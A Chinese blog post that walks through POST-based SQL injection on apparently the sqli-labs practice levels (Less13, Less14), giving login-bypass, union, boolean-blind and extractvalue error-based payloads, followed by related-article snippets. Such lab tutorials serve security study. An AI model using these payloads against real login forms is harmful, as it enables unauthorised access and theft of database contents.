SQL-Post注入

最新推荐文章于 2024-06-25 17:37:52 发布
最新推荐文章于 2024-06-25 17:37:52 发布
阅读量301 收藏 3
点赞数 10
分类专栏: MySql-injection 文章标签: sql 数据库 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61802503/article/details/137828325
版权

Post注入

  • 在登录过程中,输入用户名和密码,用户名和密码以表单的形式提交,
    提交到服务器后服务器再进行验证。这就是一次post的过程的。

  • 在输入正确的用户名和密码后显示
    在这里插入图片描述

  1. 尝试会不会回显报错信息,输入admin'--+,回显报错了。在这里插入图片描述

  2. 尝试万能密码 admin’or’1’='1# ,成功登录并且回显信息。
    在这里插入图片描述

  3. 尝试联合注入

Username:1admin'union select 1,database()#
password:(任意密码)

显示数据库名了。
在这里插入图片描述

Less13

  1. Username:admin’,分析报错,程序对id进行了’)的处理。在这里插入图片描述
  2. 尝试布尔盲注,登录成功,可以利用二分法猜解。
uname=admin')and left(database(),1)>'a'#&passwd=1&submit=Submit

在这里插入图片描述

Less14

  1. 尝试盲注,登录成功。
admin"and left(database(),1)>'a'#&passwd=1&submit=Submit

在这里插入图片描述
2. 利用报错注入,成功回显数据库版本。

admin"and extractvalue(1,concat(0x7e,(select @@version),0x7e))#&passwd=1&submi
 t=Submit

在这里插入图片描述

CyberSecure
关注
  • 10
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
MySQL数据库-SQL注入手册1
08-08
This post is part of a series of SQL Injection Cheat Sheets. In this series, I’
SQL注入 - POST注入方法
HAKUNAMATATATTA的博客
08-30 779
SQL注入-POST注入方法教学
SQL注入post注入
banliyaoguai的博客
05-21 670
GET请求的参数是通过URL传输的,而URL的长度往往被浏览器所限制,通常为2048个字符,因此GET请求的参数传输长度是被限制的。GET请求可以被缓存,因为GET请求是幂等的,即多次相同的GET请求对服务器的状态没有影响,可以使用缓存来提高性能。POST请求不是幂等的,多次相同的POST请求会对服务器的状态产生影响,可能会改变服务器的数据。GET请求是幂等的,即多次相同的GET请求对服务器的状态没有影响,不会改变服务器的数据。GET请求通过URL的请求行来提交数据,这些数据在URL中是可见的。
sql注入 pikachu post数字型注入
08-12
SQL 注入 Pikachu Post 数字型注入 SQL 注入是一种常见的 Web 应用安全漏洞,攻击者可以通过在输入字段中注入恶意的 SQL 语句来获取或修改敏感数据。在本文中,我们将探讨一种新的 Post 数字型注入方法,即使用 ...
SQL注入思路详解
12-14
一、SQL注入可以分为三个步骤 1.识别Web应用与数据库交互的可能输入(识别潜在注入点) 2.SQL注入语句测试 3.根据服务器返回判定注入语句是否影响了SQL执行结果以判断是否存在SQL注入     2.识别Web应用与数据库...
sql-bypass.py
05-25
sql注入垃圾数据绕waf,如果是POST型就直接把垃圾数据放到你要注入的字段前后,如果是GET型就把他转为POST型再放垃圾数据。
第14天:WEB漏洞-SQL注入之类型及提交注入1
08-03
3. **JSON数据注入**:通过POST提交JSON对象,如本地环境代码演示,攻击者可能修改JSON数据来注入SQL。 4. **COOKIE数据提交注入**:Lesson 20中,攻击者可能改变COOKIE值来触发注入。 5. **HTTP头参数数据注入**:...
MyBatis-Plus 查询不到数据,但使用 SQL 可以查询到数据的问题排查
weixin_74268571的博客
06-22 838
MyBatis-Plus 查询不到数据,但使用 SQL 可以查询到数据的问题详细排查和解决方案
PostgreSQL源码分析——绑定变量
让我思考一下
06-18 280
这里分析一下函数中应用绑定变量的问题,但实际应用场景中,不推荐这么使用。
PostgreSQL源码分析——INSERT
让我思考一下
06-18 471
这里我们对INSERT语句进行分析, 只分析其宏观过程,具体细节后续再分析。我们就分析下面的语句的执行过程。
Mybatis (plus 也适用)原生直接执行某句SQL
weixin_44131922的博客
06-18 352
想要不论传入什么sql 都能直接执行。
PostgreSQL源码分析——CREATE DATABASE
让我思考一下
06-18 745
这里我们分析一下在PostgreSQL中创建数据库的源码,在分析源码之前,最好先阅读《PostgreSQL指南内幕探索》的第一章,数据库集簇、数据库和数据表,弄清其空间布局,理解PG中,数据库、表、元组是怎么布局的。通俗一点说,创建一个数据库相当于创建一个数据目录,在这个目录下,存放该数据库中定义的表、索引等对象。
PostgreSQL源码分析 —— 除法运算符
让我思考一下
06-18 458
我们分析一下在PostgreSQL数据库中,是如何实现除法操作的。其他的运算符操作与之类似。
PostgreSQL源码分析——常量表达式化简
让我思考一下
06-18 435
常量表达式可以进行化简,可降低执行器计算表达式的代价。在逻辑优化阶段,会判断是否可以进行常量表达式化简,如果可以,则在执行器执行之前就预先对常量表达式树进行计算,计算出常量后,以新计算出的常量表达式代替原有的表达式。当进入执行器时,此时表达式已被替换为常量,避免了在执行器中频繁的计算表达式。可以看到,在逻辑优化阶段,常量表达式已被化简为常量,进入执行器时,表达式树已被替换为常量。除了常量表达式,常量函数也可以在逻辑优化阶段提前执行,计算得到常量,用常量替换原有的函数表达式。,是常量表达式,可以进行化简。
57.SAP MII产品介绍(07)功能详解(06)Workbench-SQLQuery
智盟科技智能制造团队的博客
06-19 388
您可以使用SAP Manufacturing Integration and Intelligence(SAP MII)Workbench中的SQLQuery来创建访问面向SQL的连接器(如IDBC连接器)的模板。此查询的扩展名为tqsq。
PostgreSQL 17 Beta 1 发布!
PGCCC的博客
06-25 404
PostgreSQL 全球开发小组宣布,PostgreSQL 17 的第一个测试版本现已可供下载。此版本包含 PostgreSQL 17 正式发布时将提供的所有功能的预览,但测试期间版本的某些细节可能会发生变化。#PG培训#PG考试#postgresql培训#postgresql考试#postgresql认证本着开源 PostgreSQL 社区的精神,我们强烈建议您在您的系统上测试 PostgreSQL 17 的新功能,以帮助我们消除可能存在的错误或其他问题。
PGSQL的TimescaleDB
qq_35761348的博客
06-25 45
通过 time 进行分区将普通表转换为超表:SELECT create_hypertable('表名','time')SELECT add_retention_policy('表名', INTERVAL '3 weeks');SELECT drop_chunks('表名', INTERVAL '3 weeks');SELECT remove_retention_policy('表名', true);4、新建数据库保留策略(day、weeks、months、years)5、查看超表的块列表。
PostgreSQL源码分析 —— CAST类型转换
让我思考一下
06-18 581
我们分析一下PostgreSQL中显式类型转换是如何实现的,在PostgreSQL中,显式类型转换可以用等同于。这里我们以为例进行分析。再结合之前对的分析,基本就弄清了一部分PostgreSQL中数据类型转换问题。当然要完整的理解类型转换还需要完整的理解PostgreSQL中的类型系统,后续还需要我们逐步的深入理解。
case when 使用——mysql sql
最新发布
global_coding的博客
06-25 91
case when 使用——mysql sql
sqlpost注入的万能语句
06-10
SQL 注入攻击中,POST 注入的万能语句是指可以欺骗 web 应用程序执行非授权的数据库操作的 SQL 语句。POST 注入通常是通过提交 POST 请求来触发的,攻击者在 POST 请求中添加恶意的 SQL 代码,从而欺骗应用程序执行恶意操作。 以下是一些常见的 POST 注入攻击用到的 SQL 语句: 1. SELECT * FROM users WHERE username = 'admin' AND password = 'password' OR '1'='1' 这个语句的含义是,查询表中所有用户名为 'admin' 且密码为 'password' 的数据,或者查询表中所有数据,因为 '1'='1' 恒成立,所以这个语句会返回表中的所有数据。 2. SELECT * FROM users WHERE username = 'admin' UNION SELECT 1,2,3,4,5,6 这个语句的含义是,查询表中所有用户名为 'admin' 的数据,并将其与 SELECT 语句返回的值合并,返回一个新的结果集。在这个例子中,新的结果集只包含一个值为 1,2,3,4,5,6 的行。 为了避免 SQL 注入攻击,应用程序需要进行有效的输入验证和数据过滤。具体来说,可以采取以下措施: 1. 对所有输入数据进行过滤和验证,并使用参数化查询或存储过程等安全的查询方式。 2. 最小化数据库用户的权限,并限制数据库用户的访问范围。 3. 定期更新数据库和应用程序,并及时修补已知的安全漏洞。 4. 实施访问控制和身份验证机制,以确保只有授权的用户才能访问敏感数据。 5. 监控和记录所有数据库访问,及时发现和处理异常行为。 通过采取上述措施,可以有效地缓解 SQL 注入攻击带来的安全威胁。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

CyberSecure

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值